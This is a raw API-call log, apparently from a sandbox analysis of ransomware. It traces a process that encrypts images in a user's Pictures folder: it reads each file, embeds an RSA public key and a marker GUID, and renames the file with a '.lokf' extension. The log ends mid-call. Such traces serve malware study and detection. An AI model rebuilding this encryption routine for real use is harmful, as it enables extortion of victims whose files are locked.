RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.247] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\urTk_7SAl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\urtk_7sal.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\urTk_7SAl.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\urtk_7sal.png.lokf")) returned 1 [0059.251] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf65960, ftCreationTime.dwHighDateTime=0x1d4c5ba, ftLastAccessTime.dwLowDateTime=0x61fdf110, ftLastAccessTime.dwHighDateTime=0x1d4d4ad, ftLastWriteTime.dwLowDateTime=0x61fdf110, ftLastWriteTime.dwHighDateTime=0x1d4d4ad, nFileSizeHigh=0x0, nFileSizeLow=0x1065f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V8xM.jpg", cAlternateFileName="")) returned 1 [0059.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8xM.jpg") returned=".jpg" [0059.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8xM.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v8xm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.251] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=67167) returned 1 [0059.251] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.254] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10639, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.254] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.254] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1065f, lpOverlapped=0x0) returned 1 [0059.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.255] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.255] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.255] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.256] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.256] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.256] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.256] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.256] GetLastError () returned 0x0 [0059.256] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.256] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.256] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.256] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.256] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.256] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.256] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.257] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1065f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.257] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.257] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.257] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.257] CloseHandle (hObject=0x5cc) returned 1 [0059.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0059.258] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8xM.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v8xm.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V8xM.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v8xm.jpg.lokf")) returned 1 [0059.259] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc0430, ftCreationTime.dwHighDateTime=0x1d4d2e1, ftLastAccessTime.dwLowDateTime=0x3996550, ftLastAccessTime.dwHighDateTime=0x1d4cc33, ftLastWriteTime.dwLowDateTime=0x3996550, ftLastWriteTime.dwHighDateTime=0x1d4cc33, nFileSizeHigh=0x0, nFileSizeLow=0x1829d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WX2M.gif", cAlternateFileName="")) returned 1 [0059.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.259] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.259] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WX2M.gif") returned=".gif" [0059.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WX2M.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wx2m.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.260] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=98973) returned 1 [0059.260] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.263] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18277, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.263] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.264] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1829d, lpOverlapped=0x0) returned 1 [0059.264] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.265] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.265] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.265] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.265] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.265] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.265] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.265] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.265] GetLastError () returned 0x0 [0059.266] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.266] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.266] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.266] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.266] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.266] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.266] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.267] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1829d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.267] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.267] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.267] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.267] CloseHandle (hObject=0x5cc) returned 1 [0059.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.268] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0059.268] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WX2M.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wx2m.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WX2M.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wx2m.gif.lokf")) returned 1 [0059.269] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 1 [0059.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.269] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.269] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y_Dz9ypir.gif") returned=".gif" [0059.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y_Dz9ypir.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y_dz9ypir.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.269] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=55716) returned 1 [0059.270] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.272] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd97e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.272] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.273] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd9a4, lpOverlapped=0x0) returned 1 [0059.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.273] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.273] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.274] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.274] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.274] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.274] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.274] GetLastError () returned 0x0 [0059.274] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.274] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.274] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.274] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.274] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.274] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.275] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.275] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.275] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd9a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.275] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.275] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.275] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.275] CloseHandle (hObject=0x5cc) returned 1 [0059.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.276] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.276] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y_Dz9ypir.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y_dz9ypir.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Y_Dz9ypir.gif.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\y_dz9ypir.gif.lokf")) returned 1 [0059.277] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 0 [0059.277] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0059.278] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.278] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, 